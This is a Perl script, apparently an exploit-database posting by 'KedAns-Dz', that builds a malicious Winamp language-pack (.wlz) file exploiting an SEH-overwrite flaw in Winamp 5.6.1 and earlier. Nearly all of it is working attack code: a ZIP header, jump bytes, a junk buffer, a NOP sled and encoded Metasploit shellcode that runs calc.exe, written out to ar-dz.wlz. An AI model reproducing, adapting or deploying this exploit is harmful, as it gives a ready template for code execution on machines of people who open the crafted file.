#!/usr/bin/perl # --------- # Winamp <=5.6.1 Install Language SEH Exploit # Author : KedAns-Dz # special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team # --------- # In Winamp 5.6.1 Install New Language with (.wlz) file # and In File (.wlz) can Inclusion SEH for Installing ... my $header = "\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\x2f\x92\x7b\x3d\xd3\x55". "\x30\x92\x00\x28\x00\x00\x00\x28\x00\x00\x08\x00\x00\x00\x61\x75". "\x74\x68\x2e\x6c\x6e\x67"; my $jump = "\xeb\x06\x90\x90" ; # short jump my $junk = "\x41" x 321; # Buffer my $nops = "\x90" x 51; # Nopsled # windows/exec - 224 bytes (http://www.metasploit.com) # EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor my $shell = "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . "\x0e\x26\x7e\x29\x35\x83\xee\xfc\xe2\xf4\xda\x96\xa0\x35" . "\x26\x7e\x49\xbc\xc3\x4f\xfb\x51\xad\x2c\x19\xbe\x74\x72" . "\xa2\x67\x32\xf5\x5b\x1d\x29\xc9\x63\x13\x17\x81\x18\xf5" . "\x8a\x42\x48\x49\x24\x52\x09\xf4\xe9\x73\x28\xf2\xc4\x8e" . "\x7b\x62\xad\x2c\x39\xbe\x64\x42\x28\xe5\xad\x3e\x51\xb0" . "\xe6\x0a\x63\x34\xf6\x2e\xa2\x7d\x3e\xf5\x71\x15\x27\xad" . "\xca\x09\x6f\xf5\x1d\xbe\x27\xa8\x18\xca\x17\xbe\x85\xf4" . "\xe9\x73\x28\xf2\x1e\x9e\x5c\xc1\x25\x03\xd1\x0e\x5b\x5a" . "\x5c\xd7\x7e\xf5\x71\x11\x27\xad\x4f\xbe\x2a\x35\xa2\x6d" . "\x3a\x7f\xfa\xbe\x22\xf5\x28\xe5\xaf\x3a\x0d\x11\x7d\x25" . "\x48\x6c\x7c\x2f\xd6\xd5\x7e\x21\x73\xbe\x34\x95\xaf\x68" . "\x4c\x7f\xa4\xb0\x9f\x7e\x29\x35\x76\x16\x18\xbe\x49\xf9" . "\xd6\xe0\x9d\x80\x27\x07\xcc\x16\x8f\xa0\x9b\xe3\xd6\xe0" . "\x1a\x78\x55\x3f\xa6\x85\xc9\x40\x23\xc5\x6e\x26\x54\x11" . "\x43\x35\x75\x81\xfc\x56\x47\x12\x4a\x1b\x43\x06\x4c\x35"; my $exploit = $header.$jump.$junk.$jump.$shell.$nops; open(myfile,'>>ar-dz.wlz'); print myfile $exploit; close (myfile); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans